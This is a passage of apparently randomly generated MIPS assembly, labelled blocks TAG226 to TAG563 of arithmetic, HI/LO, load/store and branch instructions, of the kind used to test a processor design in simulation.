TAG226:
sll $0, $0, 0
mthi $3
sltiu $1, $3, 12
mthi $1
TAG227:
srav $4, $1, $1
sltu $1, $1, $4
lhu $1, 0($1)
mult $1, $1
TAG228:
lw $1, 0($1)
addi $2, $1, 0
bne $1, $2, TAG229
sw $2, 0($1)
TAG229:
mthi $2
mfhi $4
bne $4, $4, TAG230
sw $4, 0($2)
TAG230:
mtlo $4
sw $4, 0($4)
lbu $4, 0($4)
mflo $4
TAG231:
nor $4, $4, $4
lui $1, 12
lb $4, 1($4)
lui $1, 12
TAG232:
lui $3, 6
divu $3, $1
srlv $1, $3, $1
div $3, $1
TAG233:
addu $3, $1, $1
mthi $3
beq $1, $1, TAG234
srl $4, $1, 8
TAG234:
mfhi $3
lui $3, 6
mflo $2
bne $3, $3, TAG235
TAG235:
lui $3, 6
div $2, $3
sb $2, 0($2)
mfhi $2
TAG236:
lb $2, 0($2)
bne $2, $2, TAG237
sra $1, $2, 5
sb $2, 0($2)
TAG237:
lui $2, 5
mthi $2
mflo $1
bgez $1, TAG238
TAG238:
addi $3, $1, 9
mult $1, $1
lbu $4, 0($3)
mfhi $1
TAG239:
multu $1, $1
sra $1, $1, 5
srlv $4, $1, $1
ori $4, $1, 3
TAG240:
mthi $4
sllv $2, $4, $4
slti $4, $2, 9
lw $4, 0($4)
TAG241:
sra $4, $4, 5
lui $3, 5
lui $1, 2
addiu $3, $4, 2
TAG242:
bltz $3, TAG243
div $3, $3
lui $1, 15
bgtz $3, TAG243
TAG243:
srav $2, $1, $1
srav $2, $1, $2
sll $0, $0, 0
divu $2, $1
TAG244:
blez $1, TAG245
divu $1, $1
sll $0, $0, 0
lui $1, 8
TAG245:
lui $3, 14
addiu $4, $1, 7
lui $4, 7
or $4, $1, $3
TAG246:
beq $4, $4, TAG247
sll $0, $0, 0
mtlo $4
mthi $4
TAG247:
bgtz $4, TAG248
sll $0, $0, 0
div $4, $4
mthi $4
TAG248:
mflo $1
divu $4, $1
sll $0, $0, 0
lbu $3, 0($1)
TAG249:
lb $4, 0($3)
lui $2, 10
bne $2, $4, TAG250
mflo $1
TAG250:
mfhi $3
srl $1, $1, 0
beq $3, $3, TAG251
and $3, $1, $1
TAG251:
slti $2, $3, 12
mthi $2
xor $3, $2, $3
lui $2, 5
TAG252:
div $2, $2
sll $0, $0, 0
xor $3, $2, $2
mflo $1
TAG253:
srl $3, $1, 12
lui $3, 0
lb $4, 0($3)
mult $4, $3
TAG254:
lw $1, 0($4)
lbu $2, 0($4)
sw $4, 0($2)
mthi $1
TAG255:
multu $2, $2
ori $3, $2, 9
divu $3, $3
sw $3, 0($2)
TAG256:
subu $4, $3, $3
bne $4, $4, TAG257
nor $2, $4, $4
bgez $3, TAG257
TAG257:
mthi $2
sh $2, 1($2)
sll $3, $2, 12
mfhi $2
TAG258:
bltz $2, TAG259
mthi $2
sb $2, 0($2)
srl $2, $2, 7
TAG259:
div $2, $2
lui $4, 12
mult $4, $4
mthi $4
TAG260:
mtlo $4
mflo $4
bgtz $4, TAG261
sll $0, $0, 0
TAG261:
multu $1, $1
beq $1, $1, TAG262
multu $1, $1
beq $1, $1, TAG262
TAG262:
multu $1, $1
addu $2, $1, $1
lhu $1, -256($1)
mflo $3
TAG263:
bltz $3, TAG264
mthi $3
multu $3, $3
mtlo $3
TAG264:
mflo $4
lui $1, 2
lui $2, 4
lui $1, 9
TAG265:
subu $3, $1, $1
lui $2, 4
beq $2, $2, TAG266
mult $3, $3
TAG266:
sra $4, $2, 11
sll $0, $0, 0
sll $0, $0, 0
bne $2, $4, TAG267
TAG267:
divu $4, $4
mthi $4
mthi $4
sra $4, $4, 6
TAG268:
divu $4, $4
ori $1, $4, 6
bgtz $1, TAG269
lui $4, 1
TAG269:
mtlo $4
divu $4, $4
srl $3, $4, 7
blez $4, TAG270
TAG270:
mtlo $3
div $3, $3
and $1, $3, $3
multu $1, $3
TAG271:
subu $2, $1, $1
mtlo $2
sw $2, -512($1)
beq $2, $1, TAG272
TAG272:
lui $4, 12
mfhi $1
lhu $2, 0($2)
lbu $3, 0($1)
TAG273:
beq $3, $3, TAG274
mtlo $3
lh $1, 0($3)
multu $1, $3
TAG274:
mult $1, $1
sw $1, 0($1)
mflo $1
bgtz $1, TAG275
TAG275:
mult $1, $1
mthi $1
lb $3, 0($1)
mult $3, $1
TAG276:
mthi $3
bne $3, $3, TAG277
mtlo $3
mfhi $4
TAG277:
mult $4, $4
mult $4, $4
lb $3, 0($4)
lui $2, 15
TAG278:
beq $2, $2, TAG279
mult $2, $2
mthi $2
mflo $3
TAG279:
mult $3, $3
lbu $4, 0($3)
mfhi $3
lui $1, 10
TAG280:
beq $1, $1, TAG281
sll $0, $0, 0
mtlo $1
mthi $1
TAG281:
mult $1, $1
lui $3, 4
bgtz $3, TAG282
sll $0, $0, 0
TAG282:
bgez $1, TAG283
lui $3, 14
blez $1, TAG283
lb $4, 0($1)
TAG283:
mtlo $4
blez $4, TAG284
mfhi $2
sh $4, 0($2)
TAG284:
lui $1, 5
mflo $2
sltiu $2, $2, 10
mfhi $1
TAG285:
mflo $4
lui $4, 3
divu $4, $4
addu $2, $1, $4
TAG286:
multu $2, $2
ori $3, $2, 0
mflo $1
mult $2, $3
TAG287:
mfhi $4
sb $4, 0($4)
subu $4, $1, $1
mfhi $2
TAG288:
bltz $2, TAG289
lui $3, 15
divu $2, $3
lui $3, 5
TAG289:
bne $3, $3, TAG290
srav $1, $3, $3
and $2, $3, $3
mthi $3
TAG290:
sll $0, $0, 0
ori $4, $2, 4
sll $0, $0, 0
mflo $3
TAG291:
mult $3, $3
slti $1, $3, 10
mult $1, $3
addu $3, $3, $1
TAG292:
mfhi $2
beq $3, $2, TAG293
lb $4, 0($3)
lb $3, 0($3)
TAG293:
multu $3, $3
multu $3, $3
bne $3, $3, TAG294
lui $4, 6
TAG294:
divu $4, $4
srl $2, $4, 8
sltiu $3, $2, 9
bgez $4, TAG295
TAG295:
lw $3, 0($3)
bne $3, $3, TAG296
lbu $3, 0($3)
mult $3, $3
TAG296:
bne $3, $3, TAG297
mfhi $4
lw $2, 0($4)
sb $3, 0($3)
TAG297:
mflo $3
lui $3, 6
lui $2, 5
bgez $2, TAG298
TAG298:
xor $4, $2, $2
beq $4, $2, TAG299
mfhi $1
addiu $2, $2, 13
TAG299:
srlv $3, $2, $2
xori $1, $3, 1
subu $3, $1, $2
lui $3, 0
TAG300:
mflo $2
mflo $4
sw $2, 0($4)
bgez $4, TAG301
TAG301:
lb $1, 0($4)
lui $2, 6
blez $1, TAG302
sb $2, 0($4)
TAG302:
mfhi $1
sll $0, $0, 0
mfhi $2
sw $4, 0($2)
TAG303:
mthi $2
subu $4, $2, $2
sw $4, 0($2)
sw $4, 0($2)
TAG304:
mult $4, $4
sllv $1, $4, $4
beq $1, $1, TAG305
sb $1, 0($1)
TAG305:
mflo $3
bltz $3, TAG306
mflo $2
sb $2, 0($2)
TAG306:
andi $1, $2, 11
mflo $4
bltz $2, TAG307
mtlo $2
TAG307:
sh $4, 0($4)
beq $4, $4, TAG308
lbu $4, 0($4)
sll $4, $4, 11
TAG308:
multu $4, $4
slti $3, $4, 12
andi $3, $4, 10
xor $1, $3, $3
TAG309:
lbu $1, 0($1)
lui $2, 10
addi $2, $1, 7
sub $4, $2, $1
TAG310:
lui $1, 5
sll $0, $0, 0
div $1, $4
mtlo $4
TAG311:
div $1, $1
multu $1, $1
bne $1, $1, TAG312
lui $4, 12
TAG312:
subu $4, $4, $4
mult $4, $4
and $3, $4, $4
bltz $4, TAG313
TAG313:
sh $3, 0($3)
mfhi $3
lui $2, 9
multu $2, $3
TAG314:
sll $0, $0, 0
lui $1, 7
mthi $2
beq $1, $1, TAG315
TAG315:
sll $0, $0, 0
bne $1, $1, TAG316
lui $4, 1
srl $3, $4, 5
TAG316:
mfhi $4
divu $4, $4
sb $3, -2048($3)
mtlo $3
TAG317:
sll $0, $0, 0
bgtz $4, TAG318
sll $0, $0, 0
slt $2, $4, $4
TAG318:
mthi $2
bltz $2, TAG319
andi $1, $2, 3
bne $2, $1, TAG319
TAG319:
sw $1, 0($1)
blez $1, TAG320
mfhi $3
bne $3, $1, TAG320
TAG320:
addiu $4, $3, 4
mfhi $2
sltu $4, $4, $2
mflo $3
TAG321:
beq $3, $3, TAG322
addu $3, $3, $3
lui $2, 12
lhu $4, 0($3)
TAG322:
blez $4, TAG323
mthi $4
lui $2, 4
mult $2, $4
TAG323:
bgtz $2, TAG324
or $4, $2, $2
addi $3, $2, 12
divu $4, $3
TAG324:
sra $2, $3, 4
sw $3, -4096($3)
blez $2, TAG325
lui $3, 6
TAG325:
sll $0, $0, 0
bltz $4, TAG326
sll $0, $0, 0
blez $4, TAG326
TAG326:
mthi $4
bgtz $4, TAG327
div $4, $4
bne $4, $4, TAG327
TAG327:
sll $0, $0, 0
sll $0, $0, 0
divu $4, $3
beq $4, $4, TAG328
TAG328:
mtlo $3
mfhi $1
bltz $3, TAG329
sll $0, $0, 0
TAG329:
sra $2, $3, 11
beq $2, $2, TAG330
mflo $4
divu $3, $4
TAG330:
beq $4, $4, TAG331
lui $2, 15
sw $4, 0($2)
lui $1, 5
TAG331:
sll $0, $0, 0
sllv $1, $1, $3
addiu $3, $1, 10
sll $0, $0, 0
TAG332:
sll $0, $0, 0
lui $3, 2
sll $0, $0, 0
sllv $3, $2, $2
TAG333:
sll $0, $0, 0
slti $3, $3, 6
mtlo $3
mfhi $4
TAG334:
bltz $4, TAG335
sra $4, $4, 7
lui $2, 0
blez $4, TAG335
TAG335:
srlv $3, $2, $2
sb $2, 0($2)
bne $2, $3, TAG336
lh $2, 0($3)
TAG336:
addiu $1, $2, 12
mfhi $4
mfhi $1
beq $2, $1, TAG337
TAG337:
mflo $3
sll $0, $0, 0
beq $3, $1, TAG338
xori $1, $1, 5
TAG338:
mult $1, $1
mtlo $1
bne $1, $1, TAG339
sll $0, $0, 0
TAG339:
sll $0, $0, 0
mtlo $4
bne $4, $4, TAG340
mtlo $4
TAG340:
beq $4, $4, TAG341
sll $0, $0, 0
lh $3, 0($4)
slt $3, $3, $4
TAG341:
mflo $2
bne $2, $3, TAG342
sw $2, 0($3)
mfhi $3
TAG342:
lbu $2, 0($3)
sh $2, 0($3)
lhu $2, 0($2)
mfhi $2
TAG343:
div $2, $2
mfhi $4
mfhi $1
mult $1, $1
TAG344:
sw $1, 0($1)
beq $1, $1, TAG345
slti $3, $1, 13
mult $1, $3
TAG345:
sb $3, 0($3)
addu $2, $3, $3
slt $1, $2, $3
multu $1, $1
TAG346:
lhu $2, 0($1)
mult $1, $1
or $4, $2, $2
bgez $1, TAG347
TAG347:
sll $0, $0, 0
mthi $4
sra $1, $4, 14
bne $1, $2, TAG348
TAG348:
lb $3, 0($1)
bgtz $3, TAG349
multu $1, $1
mfhi $2
TAG349:
bgez $2, TAG350
mtlo $2
xori $2, $2, 9
mthi $2
TAG350:
lui $1, 1
multu $1, $1
bltz $2, TAG351
mflo $1
TAG351:
beq $1, $1, TAG352
sb $1, 0($1)
mthi $1
mtlo $1
TAG352:
mfhi $3
bltz $3, TAG353
mthi $1
mfhi $1
TAG353:
bgtz $1, TAG354
lhu $4, 0($1)
bltz $4, TAG354
mult $1, $1
TAG354:
mthi $4
sw $4, -256($4)
multu $4, $4
sb $4, -256($4)
TAG355:
mflo $2
mtlo $2
multu $2, $2
mult $2, $2
TAG356:
lui $2, 13
mthi $2
bne $2, $2, TAG357
sltu $1, $2, $2
TAG357:
mult $1, $1
bne $1, $1, TAG358
lw $4, 0($1)
mult $4, $4
TAG358:
mtlo $4
and $2, $4, $4
lui $4, 1
lhu $2, -256($2)
TAG359:
bgez $2, TAG360
lw $4, -256($2)
sltu $4, $4, $2
addiu $2, $4, 9
TAG360:
div $2, $2
mtlo $2
sh $2, -256($2)
bne $2, $2, TAG361
TAG361:
sll $0, $0, 0
mfhi $4
lui $2, 0
lui $3, 5
TAG362:
sll $0, $0, 0
mfhi $2
bltz $2, TAG363
srlv $1, $3, $2
TAG363:
beq $1, $1, TAG364
sll $0, $0, 0
sw $1, 0($1)
mult $1, $1
TAG364:
nor $4, $1, $1
bgtz $1, TAG365
sll $0, $0, 0
bltz $1, TAG365
TAG365:
slti $1, $4, 1
lb $1, 0($1)
xor $1, $1, $4
addu $2, $1, $4
TAG366:
divu $2, $2
sll $0, $0, 0
sll $0, $0, 0
xori $1, $2, 2
TAG367:
div $1, $1
xori $2, $1, 13
sll $0, $0, 0
sll $0, $0, 0
TAG368:
xori $3, $4, 3
blez $3, TAG369
mthi $4
and $2, $4, $4
TAG369:
div $2, $2
lui $3, 2
sll $0, $0, 0
addiu $4, $3, 4
TAG370:
srlv $4, $4, $4
bgez $4, TAG371
multu $4, $4
mtlo $4
TAG371:
beq $4, $4, TAG372
mfhi $3
mflo $1
lb $1, 0($3)
TAG372:
mfhi $3
lui $3, 7
addiu $1, $3, 6
sll $0, $0, 0
TAG373:
mthi $1
lui $2, 12
sll $0, $0, 0
mflo $3
TAG374:
lui $2, 11
sll $0, $0, 0
lui $2, 5
sll $0, $0, 0
TAG375:
lui $1, 3
sll $0, $0, 0
beq $1, $1, TAG376
sll $0, $0, 0
TAG376:
divu $3, $3
addu $3, $3, $3
mfhi $4
lhu $3, 0($4)
TAG377:
subu $3, $3, $3
sb $3, 0($3)
bne $3, $3, TAG378
lui $4, 9
TAG378:
mflo $3
sb $3, 0($3)
bne $4, $3, TAG379
sb $3, 0($3)
TAG379:
lui $2, 4
lui $4, 4
beq $3, $2, TAG380
sllv $4, $2, $2
TAG380:
mflo $4
lb $1, 0($4)
mfhi $1
lui $3, 10
TAG381:
sll $0, $0, 0
sll $0, $0, 0
sll $0, $0, 0
multu $2, $1
TAG382:
sll $0, $0, 0
blez $2, TAG383
mfhi $2
sra $3, $2, 13
TAG383:
lui $2, 15
lui $1, 1
ori $1, $2, 2
lui $4, 12
TAG384:
mfhi $2
ori $2, $2, 12
sh $2, 0($2)
mult $2, $4
TAG385:
lui $4, 15
lw $1, 0($2)
lui $4, 11
multu $2, $1
TAG386:
sll $0, $0, 0
lui $4, 8
slt $2, $4, $4
bne $2, $4, TAG387
TAG387:
sw $2, 0($2)
mflo $2
bltz $2, TAG388
srl $3, $2, 9
TAG388:
mthi $3
sll $0, $0, 0
bltz $3, TAG389
mult $3, $3
TAG389:
sll $0, $0, 0
sll $0, $0, 0
bne $3, $4, TAG390
subu $1, $3, $4
TAG390:
mtlo $1
sll $0, $0, 0
sll $0, $0, 0
sll $0, $0, 0
TAG391:
subu $4, $2, $2
lui $4, 1
mfhi $2
div $4, $2
TAG392:
bne $2, $2, TAG393
multu $2, $2
mult $2, $2
blez $2, TAG393
TAG393:
xori $2, $2, 10
mflo $1
mtlo $2
divu $1, $2
TAG394:
lui $4, 10
sll $0, $0, 0
srl $2, $3, 11
srl $3, $1, 6
TAG395:
lui $1, 15
sll $0, $0, 0
div $3, $1
sll $0, $0, 0
TAG396:
sll $0, $0, 0
mtlo $1
beq $1, $1, TAG397
sll $1, $1, 3
TAG397:
sll $0, $0, 0
ori $1, $1, 3
mflo $3
mtlo $1
TAG398:
divu $3, $3
bne $3, $3, TAG399
mfhi $2
sra $1, $3, 13
TAG399:
mflo $2
mtlo $2
bgez $2, TAG400
mflo $1
TAG400:
andi $3, $1, 3
sllv $1, $3, $1
sllv $3, $1, $3
sb $1, 0($3)
TAG401:
bgtz $3, TAG402
lbu $1, 0($3)
sllv $4, $3, $3
addiu $3, $1, 10
TAG402:
lw $2, 0($3)
mthi $3
multu $2, $3
lui $4, 1
TAG403:
lui $4, 8
sltiu $2, $4, 5
mthi $4
mthi $4
TAG404:
mfhi $4
bne $4, $2, TAG405
sll $0, $0, 0
mthi $4
TAG405:
sll $0, $0, 0
mthi $4
sll $0, $0, 0
addu $4, $4, $4
TAG406:
slti $3, $4, 14
div $3, $4
slt $4, $3, $4
lbu $2, 0($4)
TAG407:
srav $4, $2, $2
sw $2, 0($2)
bgez $4, TAG408
mflo $3
TAG408:
mfhi $2
sltu $2, $2, $3
blez $2, TAG409
lw $1, 0($2)
TAG409:
add $3, $1, $1
lui $2, 2
xor $2, $3, $2
lui $3, 8
TAG410:
sll $0, $0, 0
mfhi $1
lui $3, 15
mthi $1
TAG411:
sll $0, $0, 0
addiu $4, $3, 15
mfhi $4
sh $4, 0($4)
TAG412:
mult $4, $4
mthi $4
mthi $4
multu $4, $4
TAG413:
blez $4, TAG414
sltu $3, $4, $4
sltu $4, $4, $3
sltiu $3, $4, 7
TAG414:
xori $1, $3, 14
multu $1, $3
xori $3, $1, 12
mtlo $1
TAG415:
sltu $4, $3, $3
mult $4, $3
addiu $4, $3, 15
sllv $1, $4, $3
TAG416:
mtlo $1
bne $1, $1, TAG417
sh $1, 0($1)
xor $3, $1, $1
TAG417:
bgez $3, TAG418
lhu $4, 0($3)
ori $1, $4, 14
lw $2, 0($1)
TAG418:
sll $0, $0, 0
xori $3, $2, 12
srl $2, $3, 10
andi $4, $3, 0
TAG419:
subu $4, $4, $4
mult $4, $4
sh $4, 0($4)
slti $3, $4, 1
TAG420:
beq $3, $3, TAG421
sb $3, 0($3)
addu $3, $3, $3
lui $3, 10
TAG421:
bltz $3, TAG422
mfhi $1
subu $3, $1, $3
bgez $3, TAG422
TAG422:
sb $3, 1($3)
lui $2, 15
mtlo $2
lui $1, 5
TAG423:
xor $1, $1, $1
mthi $1
andi $4, $1, 9
mthi $1
TAG424:
lh $4, 0($4)
mflo $2
beq $4, $4, TAG425
sh $4, -511($4)
TAG425:
lui $1, 5
bne $1, $1, TAG426
multu $2, $2
blez $2, TAG426
TAG426:
xori $3, $1, 14
beq $3, $3, TAG427
addiu $4, $3, 4
lui $3, 12
TAG427:
subu $2, $3, $3
mthi $3
bgtz $2, TAG428
lui $4, 9
TAG428:
mtlo $4
lui $3, 3
sll $0, $0, 0
sll $0, $0, 0
TAG429:
bltz $2, TAG430
multu $2, $2
multu $2, $2
mult $2, $2
TAG430:
mfhi $2
srlv $1, $2, $2
mfhi $4
sh $2, 0($2)
TAG431:
sw $4, 0($4)
mthi $4
lui $3, 3
bne $4, $4, TAG432
TAG432:
sll $0, $0, 0
bltz $3, TAG433
addiu $1, $3, 9
mflo $2
TAG433:
lui $1, 15
sltiu $4, $2, 1
mflo $2
mfhi $2
TAG434:
mflo $3
add $4, $3, $2
lui $4, 0
mflo $3
TAG435:
mthi $3
sh $3, 0($3)
bltz $3, TAG436
mult $3, $3
TAG436:
mtlo $3
blez $3, TAG437
mthi $3
bltz $3, TAG437
TAG437:
mtlo $3
multu $3, $3
mflo $3
srl $2, $3, 10
TAG438:
sw $2, 0($2)
lui $4, 1
nor $3, $4, $4
multu $4, $2
TAG439:
subu $2, $3, $3
mthi $3
sra $3, $2, 15
addi $4, $3, 7
TAG440:
lui $2, 14
subu $1, $4, $2
sll $0, $0, 0
blez $4, TAG441
TAG441:
lui $4, 0
bne $4, $4, TAG442
lbu $3, 0($4)
bltz $4, TAG442
TAG442:
lhu $3, 0($3)
and $2, $3, $3
beq $3, $3, TAG443
sb $3, 0($3)
TAG443:
add $1, $2, $2
lbu $2, 0($1)
lbu $3, 0($2)
mult $2, $2
TAG444:
bgez $3, TAG445
mthi $3
beq $3, $3, TAG445
sltu $1, $3, $3
TAG445:
ori $2, $1, 9
lbu $4, 0($1)
slt $3, $2, $2
mult $4, $3
TAG446:
multu $3, $3
mtlo $3
mthi $3
bltz $3, TAG447
TAG447:
mfhi $2
mtlo $2
addiu $1, $3, 2
lui $3, 10
TAG448:
beq $3, $3, TAG449
lui $3, 9
add $2, $3, $3
divu $3, $3
TAG449:
bgez $2, TAG450
lui $2, 1
multu $2, $2
sltiu $4, $2, 5
TAG450:
mult $4, $4
lhu $3, 0($4)
blez $3, TAG451
lw $1, 0($4)
TAG451:
lui $3, 13
bltz $1, TAG452
div $1, $3
lui $4, 8
TAG452:
beq $4, $4, TAG453
sll $0, $0, 0
divu $4, $4
multu $4, $4
TAG453:
sll $0, $0, 0
sltu $3, $4, $4
lhu $1, 0($3)
beq $3, $4, TAG454
TAG454:
mult $1, $1
mthi $1
mfhi $2
multu $2, $2
TAG455:
andi $1, $2, 8
mtlo $2
mfhi $1
lui $1, 5
TAG456:
sll $0, $0, 0
mflo $1
multu $1, $1
bgtz $1, TAG457
TAG457:
mfhi $1
lui $3, 11
mthi $3
sll $0, $0, 0
TAG458:
mfhi $1
lui $3, 3
sll $0, $0, 0
sll $0, $0, 0
TAG459:
mtlo $3
lui $2, 1
mthi $2
ori $2, $2, 8
TAG460:
mtlo $2
beq $2, $2, TAG461
ori $1, $2, 5
xori $4, $1, 4
TAG461:
mflo $3
blez $4, TAG462
subu $3, $3, $3
lui $1, 10
TAG462:
bne $1, $1, TAG463
mtlo $1
bne $1, $1, TAG463
sll $0, $0, 0
TAG463:
ori $1, $2, 6
mthi $1
mtlo $1
sltu $2, $1, $2
TAG464:
multu $2, $2
lui $3, 9
mfhi $1
mthi $3
TAG465:
mult $1, $1
bgtz $1, TAG466
slt $4, $1, $1
or $1, $4, $4
TAG466:
beq $1, $1, TAG467
lhu $3, 0($1)
sh $1, 0($1)
lui $2, 0
TAG467:
lb $2, 0($2)
mflo $1
mfhi $1
lbu $4, 0($1)
TAG468:
mtlo $4
bgtz $4, TAG469
sub $1, $4, $4
sb $1, 0($1)
TAG469:
bgez $1, TAG470
sll $2, $1, 8
beq $1, $1, TAG470
mult $1, $1
TAG470:
bltz $2, TAG471
addu $4, $2, $2
multu $4, $4
sw $4, 0($2)
TAG471:
mtlo $4
lui $4, 12
div $4, $4
andi $4, $4, 15
TAG472:
addiu $3, $4, 5
mfhi $4
subu $4, $4, $3
bne $4, $4, TAG473
TAG473:
sll $0, $0, 0
div $4, $3
mtlo $4
mult $4, $4
TAG474:
mtlo $3
nor $3, $3, $3
mthi $3
beq $3, $3, TAG475
TAG475:
ori $4, $3, 12
mthi $4
beq $4, $4, TAG476
lw $3, 2($4)
TAG476:
bltz $3, TAG477
multu $3, $3
addi $4, $3, 15
mtlo $3
TAG477:
lb $4, 0($4)
blez $4, TAG478
mflo $3
lbu $4, 0($4)
TAG478:
lb $1, 0($4)
lbu $3, 0($1)
lbu $4, 0($4)
subu $3, $3, $4
TAG479:
bltz $3, TAG480
and $1, $3, $3
lui $1, 9
beq $1, $3, TAG480
TAG480:
sll $0, $0, 0
bne $1, $1, TAG481
andi $2, $1, 10
mthi $1
TAG481:
mult $2, $2
bgtz $2, TAG482
lw $4, 0($2)
srav $2, $4, $2
TAG482:
mult $2, $2
andi $4, $2, 11
mthi $4
lui $3, 7
TAG483:
sll $0, $0, 0
lui $1, 4
sltiu $1, $3, 2
bgtz $1, TAG484
TAG484:
subu $2, $1, $1
sh $2, 0($2)
bgez $1, TAG485
lui $1, 10
TAG485:
multu $1, $1
bne $1, $1, TAG486
sll $1, $1, 15
bne $1, $1, TAG486
TAG486:
lhu $4, 0($1)
lhu $3, 0($1)
sltiu $1, $4, 11
sb $4, 0($3)
TAG487:
mfhi $1
div $1, $1
beq $1, $1, TAG488
sb $1, 0($1)
TAG488:
mfhi $4
div $4, $1
divu $1, $1
addi $2, $4, 5
TAG489:
mtlo $2
lbu $2, 0($2)
lui $4, 5
beq $4, $2, TAG490
TAG490:
lui $3, 0
mflo $4
xori $1, $3, 9
lui $1, 12
TAG491:
sll $0, $0, 0
mfhi $1
lui $1, 1
bne $1, $1, TAG492
TAG492:
mfhi $3
mflo $2
mult $3, $1
or $2, $2, $2
TAG493:
multu $2, $2
bne $2, $2, TAG494
lui $3, 0
lb $3, 0($2)
TAG494:
blez $3, TAG495
lbu $3, 0($3)
sb $3, 0($3)
lhu $2, 0($3)
TAG495:
lb $2, 0($2)
mflo $3
sb $2, 0($2)
multu $3, $2
TAG496:
bne $3, $3, TAG497
sb $3, 0($3)
mtlo $3
mtlo $3
TAG497:
lbu $4, 0($3)
bne $4, $3, TAG498
lbu $1, 0($4)
lui $1, 2
TAG498:
beq $1, $1, TAG499
sll $0, $0, 0
lui $3, 5
mfhi $3
TAG499:
lui $1, 0
mtlo $1
blez $3, TAG500
mtlo $3
TAG500:
mfhi $4
mflo $3
lbu $4, 0($3)
bltz $1, TAG501
TAG501:
nor $2, $4, $4
bgez $4, TAG502
addiu $1, $4, 2
andi $1, $2, 15
TAG502:
lui $4, 4
mfhi $3
mthi $1
srl $3, $4, 1
TAG503:
mfhi $2
beq $3, $3, TAG504
sll $0, $0, 0
mfhi $2
TAG504:
lui $1, 13
lui $3, 4
lui $2, 4
addiu $3, $3, 8
TAG505:
mthi $3
ori $3, $3, 9
lui $2, 9
addu $4, $2, $2
TAG506:
mtlo $4
lui $2, 1
mfhi $1
sll $0, $0, 0
TAG507:
sra $3, $1, 14
sltu $2, $1, $1
sll $1, $3, 1
mtlo $1
TAG508:
mfhi $1
bne $1, $1, TAG509
sll $0, $0, 0
bgez $1, TAG509
TAG509:
divu $1, $1
mtlo $1
lui $3, 5
multu $1, $3
TAG510:
bgtz $3, TAG511
mthi $3
mfhi $1
bne $3, $3, TAG511
TAG511:
lui $1, 2
divu $1, $1
multu $1, $1
sll $0, $0, 0
TAG512:
mfhi $2
sll $0, $0, 0
sll $0, $0, 0
mult $3, $3
TAG513:
sll $0, $0, 0
mfhi $1
sll $0, $0, 0
mfhi $1
TAG514:
sb $1, 0($1)
sra $1, $1, 12
lui $1, 8
subu $4, $1, $1
TAG515:
lui $1, 9
bne $4, $1, TAG516
sll $0, $0, 0
beq $1, $4, TAG516
TAG516:
div $1, $1
lui $4, 4
slt $2, $4, $4
slt $1, $1, $4
TAG517:
mflo $4
nor $3, $4, $1
bgtz $4, TAG518
sb $4, 2($3)
TAG518:
mfhi $4
multu $4, $4
ori $1, $3, 5
lui $2, 7
TAG519:
sltiu $1, $2, 13
beq $1, $1, TAG520
and $1, $1, $1
lw $1, 0($1)
TAG520:
lui $1, 6
sll $0, $0, 0
sh $1, 2($3)
lui $4, 4
TAG521:
mtlo $4
beq $4, $4, TAG522
mtlo $4
mult $4, $4
TAG522:
bne $4, $4, TAG523
mtlo $4
bgtz $4, TAG523
div $4, $4
TAG523:
mthi $4
sltu $1, $4, $4
sll $0, $0, 0
bne $1, $1, TAG524
TAG524:
lui $4, 13
lhu $4, 0($1)
andi $4, $4, 5
lui $4, 14
TAG525:
bgez $4, TAG526
lui $3, 13
beq $3, $4, TAG526
sltu $4, $3, $4
TAG526:
sll $0, $0, 0
lui $3, 0
bne $3, $3, TAG527
sltu $3, $4, $3
TAG527:
blez $3, TAG528
mthi $3
bltz $3, TAG528
sb $3, 0($3)
TAG528:
beq $3, $3, TAG529
sb $3, 0($3)
beq $3, $3, TAG529
div $3, $3
TAG529:
beq $3, $3, TAG530
lui $3, 12
lbu $4, 0($3)
bgez $4, TAG530
TAG530:
mflo $3
bgtz $4, TAG531
mtlo $4
sw $3, 0($4)
TAG531:
mfhi $2
bne $2, $3, TAG532
sb $3, 0($3)
bltz $3, TAG532
TAG532:
mtlo $2
mult $2, $2
ori $2, $2, 9
lui $1, 11
TAG533:
blez $1, TAG534
ori $3, $1, 3
mflo $3
bne $1, $1, TAG534
TAG534:
sb $3, 0($3)
mflo $4
andi $1, $4, 8
lui $4, 6
TAG535:
mtlo $4
lui $2, 4
blez $4, TAG536
addu $4, $2, $2
TAG536:
ori $3, $4, 2
xori $3, $4, 3
sll $0, $0, 0
sll $0, $0, 0
TAG537:
sll $0, $0, 0
srlv $3, $3, $3
multu $3, $3
addu $2, $3, $3
TAG538:
mflo $2
mtlo $2
bne $2, $2, TAG539
mflo $1
TAG539:
lh $3, 0($1)
lh $3, 0($1)
addu $4, $3, $3
sh $4, -512($4)
TAG540:
mthi $4
sw $4, -512($4)
lb $1, -512($4)
sb $4, 0($1)
TAG541:
lbu $3, 0($1)
mult $1, $1
bne $3, $3, TAG542
subu $1, $1, $3
TAG542:
mtlo $1
srlv $3, $1, $1
mtlo $1
mult $1, $3
TAG543:
lhu $2, 0($3)
bltz $3, TAG544
mflo $3
mfhi $4
TAG544:
sw $4, 0($4)
sw $4, 0($4)
sw $4, 0($4)
add $2, $4, $4
TAG545:
mflo $2
mult $2, $2
mult $2, $2
sw $2, 0($2)
TAG546:
mflo $1
mult $1, $1
srlv $1, $2, $2
mult $1, $2
TAG547:
sh $1, 0($1)
lh $4, 0($1)
mthi $1
sw $4, 0($1)
TAG548:
multu $4, $4
sw $4, 0($4)
mult $4, $4
bne $4, $4, TAG549
TAG549:
mult $4, $4
lui $3, 11
sll $0, $0, 0
mflo $1
TAG550:
blez $1, TAG551
xori $1, $1, 0
sll $4, $1, 3
ori $2, $1, 9
TAG551:
lui $2, 9
bne $2, $2, TAG552
divu $2, $2
addu $4, $2, $2
TAG552:
bne $4, $4, TAG553
mult $4, $4
sll $0, $0, 0
bltz $3, TAG553
TAG553:
ori $4, $3, 8
bltz $3, TAG554
div $3, $4
bgez $4, TAG554
TAG554:
mflo $4
multu $4, $4
lbu $3, 0($4)
blez $3, TAG555
TAG555:
addi $4, $3, 9
lui $2, 13
xori $4, $3, 7
nor $1, $4, $2
TAG556:
mult $1, $1
mtlo $1
div $1, $1
lui $2, 5
TAG557:
mult $2, $2
lui $3, 11
sll $0, $0, 0
blez $3, TAG558
TAG558:
mtlo $3
beq $3, $3, TAG559
ori $1, $3, 13
lui $1, 1
TAG559:
subu $4, $1, $1
addiu $3, $4, 0
lui $1, 6
addiu $2, $1, 15
TAG560:
lui $1, 1
bgez $1, TAG561
multu $2, $1
mtlo $1
TAG561:
divu $1, $1
mfhi $1
bne $1, $1, TAG562
sra $4, $1, 14
TAG562:
sub $2, $4, $4
mthi $4
sub $4, $2, $2
addi $3, $4, 12
TAG563:
